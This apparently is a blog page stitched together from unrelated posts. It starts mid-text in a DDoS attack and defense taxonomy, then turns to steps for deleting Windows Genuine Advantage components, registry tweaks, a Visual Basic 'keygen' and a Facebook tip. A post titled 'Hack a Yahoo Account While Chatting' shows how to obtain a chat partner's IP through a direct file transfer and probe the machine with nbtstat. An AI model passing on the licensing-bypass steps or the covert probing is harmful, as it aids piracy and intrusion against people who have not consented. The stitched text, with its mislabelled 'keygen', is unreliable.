However, the brute-force attacks need to generate a much higher volume of attack packets than protocol attacks, to inflict damage at the victim. So by modifying the deployed protocols the victim pushes the vulnerability limit higher. Evidently, classification of the specific attack needs to take into account both the attack mechanisms used and the victim’s configuration. It is interesting to note that the variability of attack packet contents is determined by the exploited vulnerability.

Packets comprising protocol and non-filterable brute force attacks must specify some valid header fields and possibly some valid contents. For example TCP SYN attack packets cannot vary the protocol or flag field, and HTTP flood packets must belong to an established TCP connection and therefore cannot spoof source addresses, unless they hijack connections from legitimate clients.

Classification by Attack Rate Dynamics


Depending on the attack rate dynamics we differentiate between continuous rate and variable rate attacks.

Continuous Rate Attacks


The majority of known attacks deploy a continuous rate mechanism. After the onset is commanded, agent machines generate the attack packets with full force. This sudden packet flood disrupts the victim’s services quickly, and thus leads to attack detection.

Variable Rate Attacks

Variable rate attacks are more cautious in their engagement, and they vary the attack rate to avoid detection and response. Based on the rate change mechanism we differentiate between attacks with increasing rate and fluctuating rate.

Increasing Rate Attacks


Attacks that have a gradually increasing rate lead to a slow exhaustion of victim’s resources. A state change of the victim could be so gradual that its services degrade slowly over a long time period, thus delaying detection of the attack.

Fluctuating Rate Attacks

Attacks that have a fluctuating rate adjust the attack rate based on the victim’s behavior, occasionally relieving the effect to avoid detection. At the extreme end, there is the example of pulsing attacks. During pulsing attacks, agent hosts periodically abort the attack and resume it at a later time. If this behavior is simultaneous for all agents, the victim experiences periodic service disruptions. If, however, agents are divided into groups who coordinate so that one group is always active, then the victim experiences continuous denial of service.

Classification by Impact


Depending on the impact of a DDoS attack on the victim we differentiate between disruptive and degrading attacks.

Disruptive Attacks

The goal of disruptive attacks is to completely deny the victim’s service to its clients. All currently known attacks belong to this category.

Degrading Attacks

The goal of degrading attacks would be to consume some (presumably constant) portion of a victim’s resources. Since these attacks do not lead to total service disruption, they could remain undetected for a significant time period.

On the other hand, damage inflicted on the victim could be immense. For example, an attack that effectively ties up 30% of the victim’s resources would lead to denial of service to some percentage of customers during high load periods, and possibly slower average service. Some customers, dissatisfied with the quality, would consequently change their service provider and victim would thus lose income. Alternately, the false load could result in a victim spending money to upgrade its servers and networks.

Taxonomy of DDoS Defense Mechanisms


The seriousness of the DDoS problem and the increased frequency of DDoS attacks have led to the advent of numerous DDoS defense mechanisms. Some of these mechanisms address a specific kind of DDoS attack such as attacks on Web servers or authentication servers. Other approaches attempt to solve the entire generic DDoS problem. Most of the proposed approaches require certain features to achieve their peak performance, and will perform quite differently if deployed in an environment where these requirements are not met.

As is frequently pointed out, there is no “ram ban (means the weapon which never misses the target in hindi)” against DDoS attacks. Therefore we need to understand not only each existing DDoS defense approach, but also how those approaches might be combined together to effectively and completely solve the problem.

Classification by Activity Level

Based on the activity level of DDoS defense mechanisms, we differentiate between preventive and reactive mechanisms.

Preventive Mechanisms

The goal of preventive mechanisms is either to eliminate the possibility of DDoS attacks altogether or to enable potential victims to endure the attack without denying services to legitimate clients. According to these goals we further divide preventive mechanisms into attack prevention and denial-of-service prevention mechanisms.

Attack Prevention Mechanisms

Attack prevention mechanisms modify the system configuration to eliminate the possibility of a DDoS attack. Based on the target they secure, we further divide them into system security and protocol security mechanisms.

System Security Mechanisms

System security mechanisms increase the overall security of the system, guarding against illegitimate accesses to the machine, removing application bugs and updating protocol installations to prevent intrusions and misuse of the system. DDoS attacks owe their power to large numbers of subverted machines that cooperatively generate the attack streams.

If these machines were secured, the attackers would lose their army and the DDoS threat would then disappear. On the other hand, systems vulnerable to intrusions can themselves become victims of DDoS attacks in which the attacker, having gained unlimited access to the machine, deletes or alters its contents. Potential victims of DDoS attacks can be easily overwhelmed if they deploy vulnerable protocols.

Examples of system security mechanisms include monitored access to the machine, applications that download and install security patches, firewall systems, virus scanners, intrusion detection systems, access lists for critical resources, capability-based systems and client-legitimacy-based systems. The history of computer security suggests that this approach can never be 100% effective, but doing a good job here will certainly decrease the frequency and strength of DDoS attacks.

Protocol Security Mechanisms

Protocol security mechanisms address the problem of bad protocol design. Many protocols contain operations that are cheap for the client but expensive for the server. Such protocols can be misused to exhaust the resources of a server by initiating large numbers of simultaneous transactions. Classic misuse examples are the TCP SYN attack, the authentication server attack, and the fragmented packet attack, in which the attacker bombards the victim with malformed packet fragments forcing it to waste its resources on reassembling attempts.

Examples of protocol security mechanisms include guidelines for a safe protocol design in which resources are committed to the client only after sufficient authentication is done , or the client has paid a sufficient price , deployment of powerful proxy server that completes TCP connections , etc. Deploying comprehensive protocol and system security mechanisms can make the victim completely resilient to protocol attacks. Also, these approaches are inherently compatible with and complementary to all other approaches.

Denial-of-service prevention mechanisms enable the victim to endure attack attempts without denying service to legitimate clients. This is done either by enforcing policies for resource consumption or by ensuring that abundant resources exist so that legitimate clients will not be affected by the attack. Consequently, based on the prevention method, we differentiate between resource accounting and resource multiplication mechanisms.

Resource Accounting Mechanisms


Resource accounting mechanisms police the access of each user to resources based on the privileges of the user and his behavior. Such mechanisms guarantee fair service to legitimate well-behaving users. In order to avoid user identity theft, they are usually coupled with legitimacy-based access mechanisms that verify the user’s identity. Approaches proposed in illustrate resource accounting mechanisms.

Resource Multiplication Mechanisms


Resource multiplication mechanisms provide an abundance of resources to counter DDoS threats. The straightforward example is a system that deploys a pool of servers with a load balancer and installs high bandwidth links between itself and upstream routers. This approach essentially raises the bar on how many machines must participate in an attack to be effective. While not providing perfect protection, for those who can afford the costs, this approach has often proven sufficient. For example, Microsoft has used it to weather large DDoS attacks.

Reactive Mechanisms


Reactive mechanisms strive to alleviate the impact of an attack on the victim. In order to attain this goal they need to detect the attack and respond to it. The goal of attack detection is to detect every attempted DDoS attack as early as possible and to have a low degree of false positives. Upon attack detection, steps can be taken to characterize the packets belonging to the attack stream and provide this characterization to the response mechanism. We classify reactive mechanisms based on the attack detection strategy into mechanisms that deploy pattern detection, anomaly detection, hybrid detection, and third-party detection.

Mechanisms with Pattern Attack Detection

Mechanisms that deploy pattern detection store the signatures of known attacks in a database. Each communication is monitored and compared with database entries to discover occurrences of DDoS attacks. Occasionally, the database is updated with new attack signatures. The obvious drawback of this detection mechanism is that it can only detect known attacks, and it is usually helpless against new attacks or even slight variations of old attacks that cannot be matched to the stored signature. On the other hand, known attacks are easily and reliably detected, and no false positives are encountered

Mechanisms with Anomaly Attack Detection


Mechanisms that deploy anomaly detection have a model of normal system behavior, such as a model of normal traffic dynamics or expected system performance. The current state of the system is periodically compared with the models to detect anomalies. Approaches presented in provide examples of mechanisms that use anomaly detection. The advantage of anomaly detection over pattern detection is that unknown attacks can be discovered. However, anomaly-based detection has to address two issues:

1. Threshold setting. Anomalies are detected when the current system state differs from the model by a certain threshold. The setting of a low threshold leads to many false positives, while a high threshold reduces the sensitivity of the detection mechanism.

2. Model update. Systems and communication patterns evolve with time, and models need to be updated to reflect this change. Anomaly based systems usually perform automatic model update using statistics gathered at a time when no attack was detected. This approach makes the detection mechanism vulnerable to increasing rate attacks that can mistrial models and delay or even avoid attack detection.

Mechanisms with Hybrid Attack Detection

Mechanisms that deploy hybrid detection combine the pattern-based and anomaly-based detection, using data about attacks discovered through an anomaly detection mechanism to devise new attack signatures and update the database. Many intrusion detection systems use hybrid detection. If these systems are fully automated, properly extracting a signature from a detected attack can be challenging. The system must be careful not to permit attackers to fool it into detecting normal behavior as an attack signature, or the system itself becomes a denial-of-service tool.

Mechanisms with Third-Party Attack Detection


Mechanisms that deploy third-party detection do not handle the detection process themselves, but rely on an external message that signals the occurrence of the attack and provides attack characterization. Examples of mechanisms that use third-party detection are easily found among trace back mechanisms The goal of the attack response is to relieve the impact of the attack on the victim, while imposing minimal collateral damage to legitimate clients of the victim. I classify reactive mechanisms based on the response strategy into mechanisms that deploy agent identification, rate-limiting, filtering and reconfiguration approaches.

Agent Identification Mechanisms

Agent identification mechanisms provide the victim with information about the identity of the machines that are performing the attack. This information can then be combined with other response approaches to alleviate the impact of the attack. Agent identification examples include numerous trace back techniques and approaches that eliminate spoofing thus enabling use of the source address field for agent identification.

Rate-Limiting Mechanisms


Rate-limiting mechanisms impose a rate limit on a stream that has been characterized as malicious by the detection mechanism. Examples of rate limiting mechanisms are found in Rate limiting is a lenient response technique that is usually deployed when the detection mechanism has a high level of false positives or cannot precisely characterize the attack stream. The disadvantage is that they allow some attack traffic through, so extremely high scale attacks might still be effective even if all traffic streams are rate-limited.

Filtering Mechanisms

Filtering mechanisms use the characterization provided by a detection mechanism to filter out the attack stream completely. Examples include dynamically deployed firewalls , and also a commercial system Traffic Master . Unless detection strategy is very reliable, filtering mechanisms run the risk of accidentally denying service to legitimate traffic. Worse, clever attackers might leverage them as denial-of service tools.

Reconfiguration Mechanisms

Reconfiguration mechanisms change the topology of the victim or the intermediate network to either add more resources to the victim or to isolate the attack machines. Examples include reconfigurable overlay networks, resource replication services, attack isolation strategies etc. Reactive DDoS defense mechanisms can perform detection and response either alone or in cooperation with other entities in the Internet. Based on the cooperation degree we differentiate between autonomous, cooperative and interdependent mechanisms.

Autonomous Mechanisms

Autonomous mechanisms perform independent attack detection and response. They are usually deployed at a single point in the Internet and act locally. Firewalls and intrusion detection systems provide an easy example of autonomous mechanisms.

Cooperative Mechanisms

Cooperative mechanisms are capable of autonomous detection and response, but can achieve significantly better performance through cooperation with other entities. Mechanisms deploying pushback provide examples of cooperative mechanisms. They detect the occurrence of a DDoS attack by observing congestion in a router’s buffer, characterize the traffic that creates the congestion, and act locally to impose a rate limit on that traffic. However, they achieve significantly better performance if the rate limit requests can be propagated to upstream routers who otherwise may be unaware of the attack.

Interdependent Mechanisms


Interdependent mechanisms cannot operate autonomously; they rely on other entities either for attack detection or for efficient response. Traceback mechanisms provide examples of interdependent mechanisms. A traceback mechanism deployed on a single router would provide almost no benefit.

Classification by Deployment Location

With regard to a deployment location, we differentiate between DDoS mechanisms deployed at the victim, intermediate, or source network.

Victim-Network Mechanisms

DDoS defense mechanisms deployed at the victim network protect this network from DDoS attacks and respond to detected attacks by alleviating the impact on the victim. Historically, most defense systems were located at the victim since it suffered the greatest impact of the attack and was therefore the most motivated to sacrifice some resources for increased security. Resource accounting and protocol security mechanisms provide examples of these systems.

Intermediate-Network Mechanisms

DDoS defense mechanisms deployed at the intermediate network provide infrastructural service to a large number of Internet hosts. Victims of DDoS attacks can contact the infrastructure and request the service, possibly providing adequate compensation. Pushback and traceback techniques are examples of intermediate-network mechanisms.

Source-Network Mechanisms

The goal of DDoS defense mechanisms deployed at the source network is to prevent customers using this network from generating DDoS attacks. Such mechanisms are necessary and desirable, but motivation for their deployment is low since it is unclear who would pay the expenses associated with this service. Mechanisms proposed in provide examples of source-network mechanisms.

How to Remove Windows Genuine Advantage Notifications Screen

Disclaimer: This article is for informational and educational purpose only, as most information is found on various part of Internet. Readers should contacts Microsoft if their licensed or OEM software cannot be validated or purchase genuine software.

When you log on to a non-genuine copy of Windows XP, the following notification error message “This copy of Windows is not genuine” will pop-up on the logon process:


And the nicely said “You may be a victim of software counterfeiting” message on the bottom right corner of log-in screen:


Microsoft allows Windows faithfuls to have 2 options: Get Genuine or Resolve Later. Click on Resolve Later will temporarily bypass the notification and let you login into and use Windows nagged with notification icon and messages, which will randomly appear as balloon notification message with an icon in the notification area (system tray).


Clicking on the balloon notification or the notification area icon will lead you to the Windows Genuine Advantage Validation Failure Web page that contains the specifics of the validation failure and the steps that you can take to make the operating system genuine.
To get rid of the WGA notifications that intends to remind you that your Windows is not validated, you can buy a validly licensed copy of genuine Microsoft Windows.

With new release of  WGA, some methods no longer works, and some has been updated. Several methods that has certain success on certain people, you may try until you success.

   1. Lauch Windows Task Manager.
   2. End wgatray.exe process in Task Manager.
   3. Restart Windows XP in Safe Mode.
   4. Delete WgaTray.exe from c:\Windows\System32.
   5. Delete WgaTray.exe from c:\Windows\System32\dllcache.
   6. Lauch RegEdit.
   7. Browse to the following location:
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
      Windows NT\CurrentVersion\Winlogon\Notify
   8. Delete the folder ‘WgaLogon’ and all its contents
   9. Reboot Windows XP.

Note: With this method, you may be prompted to install WGA Notifications again which can still be unselected.

How to enable Task Manager, Regedit, System Restore, MsConfig, Control Panel, Cmd, Run After a virus attack

That’s where tools like Re-Enable aid the user. The software programoffers to activate Windows features like Regedit, Windows Task Manager, System Restore, MsConfig or the Control Panel after a virus attack.

It displays all features in the main interface upon startup. Some or all of the apps and functions can be selected for fixing.


A click on the Re-enable button after the selection will start the recovery process.

The program offers a Tool menu on top that comes with additional troubleshooting utilities. Here it is possible to restore Safe Mode, edit Hosts files, reset files and folder attributes, unhide drives, repair the desktop, repair explorer.exe startup problems or scan for and delete autorun.inf files.

Re-Enable is a handy program to repair a system after a virus attack. The developer has created a lite version which requires the Microsoft .net Framework 3.5 SP1 and a portable version which has no dependencies but is 30 times the size of the lite version (700 KB to 22 MB).
Download: Re-Enable

Hack your Server to Speed up Internet explorer "Without any software"

# Open the Registry editor.
go to Start -->Run and typing regedit.

# Once in Registry editor window is opened, navigate to the key:
HKEY_CURRENT_USER\Software\microsoft\Windows\CurrentVersion\InternetSettings.

#Now right click on the window on your right and add a New DWORD Value.
Rename it MaxConnectionsPerServer.

# Next right click on MaxConnectionsPerServer to edit the Dword Value.
Choose a base.If it is Hexadecimal,set the value to 99. If you opt for Decimal,set it to 153.

# Create another DWORD and rename it MaxConnectionsPer1_0Server.

Here,too,put the value mentioned above.

#Restart Internet Explorer and watch the boost you get in your connection.

DNS TRICK:

When you connect to a website,your computer sends information back forth.Some of this deals with resolving the site name to an IP address.This is the stuff that TCP/IP really deals with,not words.You can increase the DNS cache by a simple Registry tweak.

#Open Notepad and copy-paste the following code and save it with the filename dnscache.reg .

This is what you have to copy:
Windows registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d
Enjoy!!!

How to Make a Keygen in Visual Basic

Most commercial software uses some form of random keys to authenticate and register a legitimate copy when the program is installed. Commonly this is a series of random letters grouped in varying numbers of letters. For example, you might see this sequence: DXUWB-GPHQE-CCNYQ-QFHAT-ZFBLO on a licensed program. Specialized software called Key Generators, or KeyGen creates these codes, but you can make your own using only 16 lines of Visual Basic code.

  • Start a new project in Visual Basic, selecting the "Standard.EXE" template from the list offered under "File" and "New Project." Click on "File," "Save Project As" and name both the form and project "MyKeyGen" when prompted.
  • Add a "CommandButton" control to the open form by double clicking this control in the Toolbox on the left of your screen. This control is an icon shaped like a small rectangle. Normally it is the third control down in the right hand column of the ToolBox. Add a label to the form in the same way. The label icon is a large letter "A" in the toolbox.
  • Click on the new "Command1" button now on the form to focus on its properties in the "Properties" panel on the right. Double click on the "(Name)" property to highlight the default name, "Command1." Change this name to "KeyGen". Click on the caption property and change it to "Generate Key". Click on the new Label1 on the form and make these changes to its properties:
Delete the Caption name.
Scroll down in the properties list until you find "Height" and change this to 500.
Scroll to the bottom of the properties and change the "Width" to 1200.
  • Click on "View" in the main Visual Basic menu at the top and chose "Code." This opens the Code window where you should type these lines exactly as they appear:
Option Base 1
Option Explicit
Private Sub KeyGen_Click()
Dim n As Integer
Dim KeyGen(26) As Long
Dim NewKey, FinalKey As String
Randomize
For n = 1 To 26
KeyGen(n) = Int(Rnd * 26) + 1
KeyGen(n) = KeyGen(n) + 64
NewKey = Chr$(KeyGen(n))
FinalKey = FinalKey + NewKey
Next
FinalKey = Left(FinalKey, 5) + "-" + Mid(FinalKey, 6, 5) + "-" + Mid(FinalKey, 11, 5) + "-" + Mid(FinalKey, 17, 5)
Label1.Caption = FinalKey
End Sub
  • Save the project by clicking on "File" and "Save Project." Press "F5" to run the program. The declarations in the lines beginning "Dim" specify how the program variables are used. "KeyGen(26)" creates an array of variables with 26 possibilities and the "Option Base 1" ensures the first of the 26 is numbered one. "Randomize" generates a new random seed each time the program runs. The rest of the lines create a series of random numbers, which are then converted to letters. Since ASCII code for the alphabet begins with ASCII 65, we have to add 64 to each random number before the conversion. In the end, a list of four sets of random letters separated by hyphens is created and displayed in the label box.
Tips and Warnings

  • If you need a longer series of key letters, add an additional segment to the end of the line beginning "Final Key = Left(Finalkey,5)". Insert at the end of this line the following code:
  • + "-" + Right(FinalKey,5)
  • To create four letter sequences, or vary the number of letters in each group, change the fives in the FinalKey line to other numbers.
  • Using arrays can be tricky, particularly when you set a limit on the maximum number and use repeating sequences. If you get a message "Run-time error 9, subscript out of range," you entered a larger number in one of the lines than the array can hold.

Hack a Yahoo Account While Chatting

This is only for education purpose.
So who ever try this is at his risk.
I am not sure that this will work 100 %.
But yes will work almost 70 percent of the times.
But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u having a problem post here.

Following are the features : -

1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.

2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
Either it connects to the client directly and gets the files

3) When we use video or audio:-
a) It either goes thru the server or it has client to client connection.

And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.

So lets analyse

1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.

So lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio

1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED


Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED


Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->

2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave it. You will not get the ip.But if a direct connection is established HMMMM then the first attacker first phase is over. This is the output in your netstat. The 5101 number port is where the Attacker is connected.
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED



3) so what next???
Hmmm........ Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14

Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1E> GROUP Registered


MAC Address = 00-C0-W0-D5-EF-9A

Ok so you will ask now what next???

No you find what you can do with this network than me explaining everything.
so post ur comments and lemme know....

So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.

Wednesday, April 20, 2011

How To Edit Your Facebook Comment

After Facebook removed the “Comment” button, there was a clear risk of accidentally publishing unfinished comments as users are used to pressing “Enter” to start a new line, instead of using the key to submit their comment. Facebook took note of the concern, and added the option to edit your comment right after you posted it. They also added the instruction: “Press Shift+Enter to start a new line”.


So if you want to edit your message, click the X in the top right corner right after posting it. But be aware that the editing ability will disappear after half a minute, or as soon as somebody else comments after you. If that happens, pressing X will only allow you to remove your entire message.